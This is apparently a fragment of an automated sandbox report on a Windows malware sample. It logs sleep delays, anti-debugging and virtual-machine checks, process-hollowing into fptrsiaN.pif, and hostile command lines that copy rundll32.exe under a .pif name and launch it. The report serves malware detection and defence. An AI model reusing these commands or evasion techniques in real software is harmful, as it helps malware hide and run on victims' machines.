          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -594703s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -594594s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -594484s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -594374s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029C534C GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,1_2_029C534C
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599873Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599765Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599656Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599541Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599396Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599224Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599104Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598985Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598860Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598735Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598610Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598485Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598360Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598235Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598110Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597985Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597860Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597735Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597610Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597485Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597360Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597235Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597110Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596985Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596860Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596682Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596576Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596465Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596344Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596219Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596110Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595985Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595860Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595703Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595592Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595485Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595360Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595235Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595110Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594985Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594861Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594735Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594609Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594475Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594368Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594242Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594132Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593799Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593503Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593306Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593168Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593034Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592787Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592648Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592506Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592315Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592141Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592000Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591878Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591741Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591617Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591362Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 600000
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599829
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599701
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599583
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599462
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599350
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599237
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599125
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599016
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598872
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598725
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598591
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598443
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598284
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598052
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597567
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597360
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597199
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597035
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596755
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596605
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596404
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596252
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596134
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595992
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595856
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595672
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595453
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595300
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595176
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594804
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594691
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594567
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594442
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594317
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594192
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594067
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593942
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593817
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593692
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593567
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593442
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593317
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593192
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593067
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592942
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592817
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592704
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592567
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592442
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592317
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592191
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592067
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591942
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591817
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591692
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591567
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591442
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591301
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591176
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591051
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 590926
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 590801
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 590676
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 590551
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 600000
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599890
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599781
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599672
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599562
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599453
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599343
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599234
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599125
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599015
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598905
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598787
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598671
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598562
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598453
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598344
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598234
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598125
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598015
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597906
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597771
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597656
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597546
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597437
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597319
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597203
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597081
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596953
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596839
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596584
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596468
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596359
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596250
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596140
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596031
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595922
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595812
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595703
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595594
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595484
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595364
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595250
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595140
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595031
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594922
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594812
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594703
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594594
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594484
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594374
          Source: wscript.exe, 00000000.00000003.1698725179.0000020BDCDE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: fptrsiaN.pif, 0000000A.00000002.2999173712.0000000020021000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
          Source: wscript.exe, 00000000.00000003.1698725179.0000020BDCDE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6jdY5fA3bMSvmnETG8dos1fHzAOqXIpM%2FJOzz3JmoKnUwibfkfoNHXKWhl2rZd34HiBnm6Ntuqa7YhQEU4MjVP2%2FNRzEk%2BlktpW5Q741FhMEuLZK85McBMIR1O0DejTelw7GzvL"}],"group":"cf-nel","max_age":604800}
          Source: x.exe, 00000001.00000002.1723017408.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2987999528.000000001B2D5000.00000004.00000020.00020000.00000000.sdmp, Naisrtpf.PIF, 00000009.00000002.1838305361.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, Naisrtpf.PIF, 0000000E.00000002.1916113346.0000000000716000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2997234899.000000002F111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6jdY5fA3bMSvmnETG8dos1fHzAOqXIpM%2FJOzz3JmoKnUwibfkfoNHXKWhl2rZd34HiBnm6Ntuqa7YhQEU4MjVP2%2FNRzEk%2BlktpW5Q741FhMEuLZK85McBMIR1O0DejTelw7GzvL"}],"group":"cf-nel","max_age":604800}
          Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_1-26187
          Source: C:\Users\Public\Libraries\fptrsiaN.pifAPI call chain: ExitProcess graph end nodegraph_6-83992
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFAPI call chain: ExitProcess graph end node
          Source: C:\Users\Public\Libraries\fptrsiaN.pifAPI call chain: ExitProcess graph end node
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029DAEB0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,1_2_029DAEB0
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFProcess queried: DebugPort
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_21147820 LdrInitializeThunk,6_2_21147820
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040CE09
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,6_2_004019F0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029D3E98 LoadLibraryW,GetProcAddress,FreeLibrary,1_2_029D3E98
          Source: C:\Users\Public\ndpha.pifCode function: 8_2_00153F6B mov esi, dword ptr fs:[00000030h]8_2_00153F6B
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_0040ADB0 GetProcessHeap,HeapFree,6_2_0040ADB0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040CE09
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040E61C
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00416F6A
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_004123F1 SetUnhandledExceptionFilter,6_2_004123F1
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_1_0040CE09
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_1_0040E61C
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_1_00416F6A
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_1_004123F1 SetUnhandledExceptionFilter,6_1_004123F1
          Source: C:\Users\Public\ndpha.pifCode function: 8_2_00156510 SetUnhandledExceptionFilter,8_2_00156510
          Source: C:\Users\Public\ndpha.pifCode function: 8_2_001561C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_001561C0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0040CE09
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0040E61C
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00416F6A
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_2_004123F1 SetUnhandledExceptionFilter,10_2_004123F1
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_1_0040CE09
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_1_0040E61C
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_1_00416F6A
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 10_1_004123F1 SetUnhandledExceptionFilter,10_1_004123F1
          Source: C:\Users\Public\Libraries\fptrsiaN.pifMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\System32\wscript.exeFile created: x.exe.0.drJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Users\Public\Libraries\fptrsiaN.pif base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFMemory allocated: C:\Users\Public\Libraries\fptrsiaN.pif base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFMemory allocated: C:\Users\Public\Libraries\fptrsiaN.pif base: 400000 protect: page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection unmapped: C:\Users\Public\Libraries\fptrsiaN.pif base address: 400000Jump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection unmapped: C:\Users\Public\Libraries\fptrsiaN.pif base address: 400000Jump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFSection unmapped: C:\Users\Public\Libraries\fptrsiaN.pif base address: 400000
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Users\Public\Libraries\fptrsiaN.pif base: 2F0008Jump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFMemory written: C:\Users\Public\Libraries\fptrsiaN.pif base: 3D0008Jump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFMemory written: C:\Users\Public\Libraries\fptrsiaN.pif base: 215008
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\fptrsiaN.pif C:\Users\Public\Libraries\fptrsiaN.pifJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\ndpha.pifJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\ndpha.pif C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif Jump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFProcess created: C:\Users\Public\Libraries\fptrsiaN.pif C:\Users\Public\Libraries\fptrsiaN.pifJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFProcess created: C:\Users\Public\Libraries\fptrsiaN.pif C:\Users\Public\Libraries\fptrsiaN.pif
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,1_2_029C5510
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,1_2_029CA130
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,1_2_029CA17C
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,1_2_029C561C
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: GetLocaleInfoA,6_2_00417A20
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: GetLocaleInfoA,6_1_00417A20
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,9_2_02895510
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: GetLocaleInfoA,9_2_0289A17C
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,9_2_0289561B
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: GetLocaleInfoA,10_2_00417A20
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: GetLocaleInfoA,10_1_00417A20
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
